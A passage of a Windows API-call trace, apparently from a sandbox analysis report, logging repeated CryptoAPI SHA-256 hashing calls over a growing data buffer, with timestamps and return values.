pdwDataLen=0x1ee448) returned 1 [0262.278] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.278] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.278] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.278] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.278] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x480, dwFlags=0x0) returned 1 [0262.278] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.279] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4ad0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4ad0, pdwDataLen=0x1ee448) returned 1 [0262.279] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.279] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.279] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.279] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.279] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0262.279] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.279] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4b00, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4b00, pdwDataLen=0x1ee448) returned 1 [0262.279] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.280] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.280] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.280] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.280] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0262.280] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.280] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4b30, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4b30, pdwDataLen=0x1ee448) returned 1 [0262.280] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.280] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.280] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.281] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.281] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0262.281] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.281] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4b60, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4b60, pdwDataLen=0x1ee448) returned 1 [0262.281] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.281] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.281] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.282] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.282] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x500, dwFlags=0x0) returned 1 [0262.282] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.282] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4b90, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4b90, pdwDataLen=0x1ee448) returned 1 [0262.282] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.282] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.282] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.283] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.283] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x520, dwFlags=0x0) returned 1 [0262.283] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.283] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4bc0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4bc0, pdwDataLen=0x1ee448) returned 1 [0262.283] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.283] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.283] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.283] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.283] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x540, dwFlags=0x0) returned 1 [0262.284] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.284] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4bf0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4bf0, pdwDataLen=0x1ee448) returned 1 [0262.284] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.284] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.284] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.284] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.284] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x560, dwFlags=0x0) returned 1 [0262.284] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.284] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4c20, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4c20, pdwDataLen=0x1ee448) returned 1 [0262.284] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.284] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.284] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.285] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.285] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x580, dwFlags=0x0) returned 1 [0262.285] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.285] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4c50, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4c50, pdwDataLen=0x1ee448) returned 1 [0262.285] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.285] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.285] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.286] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.286] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0262.286] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.286] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4c80, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4c80, pdwDataLen=0x1ee448) returned 1 [0262.286] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.286] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.286] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.287] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.287] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0262.287] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.287] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4cb0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4cb0, pdwDataLen=0x1ee448) returned 1 [0262.287] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.287] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.287] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.288] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.288] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0262.288] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.288] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4ce0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4ce0, pdwDataLen=0x1ee448) returned 1 [0262.288] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.288] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.288] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.288] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.288] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x600, dwFlags=0x0) returned 1 [0262.288] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.288] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4d10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4d10, pdwDataLen=0x1ee448) returned 1 [0262.288] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.289] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.289] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.289] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.289] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x620, dwFlags=0x0) returned 1 [0262.289] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.289] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4d40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4d40, pdwDataLen=0x1ee448) returned 1 [0262.289] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.289] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.289] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.290] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.290] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x640, dwFlags=0x0) returned 1 [0262.290] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.290] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4d70, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4d70, pdwDataLen=0x1ee448) returned 1 [0262.290] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.290] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.290] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.291] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.291] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x660, dwFlags=0x0) returned 1 [0262.291] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.291] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4da0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4da0, pdwDataLen=0x1ee448) returned 1 [0262.291] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.291] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.291] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.292] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.292] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x680, dwFlags=0x0) returned 1 [0262.292] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.292] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4dd0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4dd0, pdwDataLen=0x1ee448) returned 1 [0262.292] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.292] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.292] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.292] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.292] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0262.293] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.293] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4680, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4680, pdwDataLen=0x1ee448) returned 1 [0262.293] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.293] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.293] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.293] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.293] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0262.294] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.294] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de320, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de320, pdwDataLen=0x1ee448) returned 1 [0262.294] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.294] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.294] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.294] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.294] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0262.294] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.294] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de380, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de380, pdwDataLen=0x1ee448) returned 1 [0262.294] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.294] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.294] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.295] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.295] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x700, dwFlags=0x0) returned 1 [0262.295] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.295] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de3b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de3b0, pdwDataLen=0x1ee448) returned 1 [0262.295] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.295] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.295] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.296] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.296] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x720, dwFlags=0x0) returned 1 [0262.296] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.296] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de3e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de3e0, pdwDataLen=0x1ee448) returned 1 [0262.296] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.296] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.296] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.297] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.297] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x740, dwFlags=0x0) returned 1 [0262.297] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.297] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de410, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de410, pdwDataLen=0x1ee448) returned 1 [0262.297] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.297] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.297] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.298] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.298] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x760, dwFlags=0x0) returned 1 [0262.298] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.298] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de440, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de440, pdwDataLen=0x1ee448) returned 1 [0262.298] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.298] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.298] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.298] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.298] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x780, dwFlags=0x0) returned 1 [0262.298] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.299] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de470, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de470, pdwDataLen=0x1ee448) returned 1 [0262.299] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.299] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.299] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.299] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.299] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0262.299] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.299] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de4a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de4a0, pdwDataLen=0x1ee448) returned 1 [0262.299] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.299] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.299] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.300] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.300] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0262.300] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.300] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2de4d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2de4d0, pdwDataLen=0x1ee448) returned 1 [0262.300] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.300] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.300] 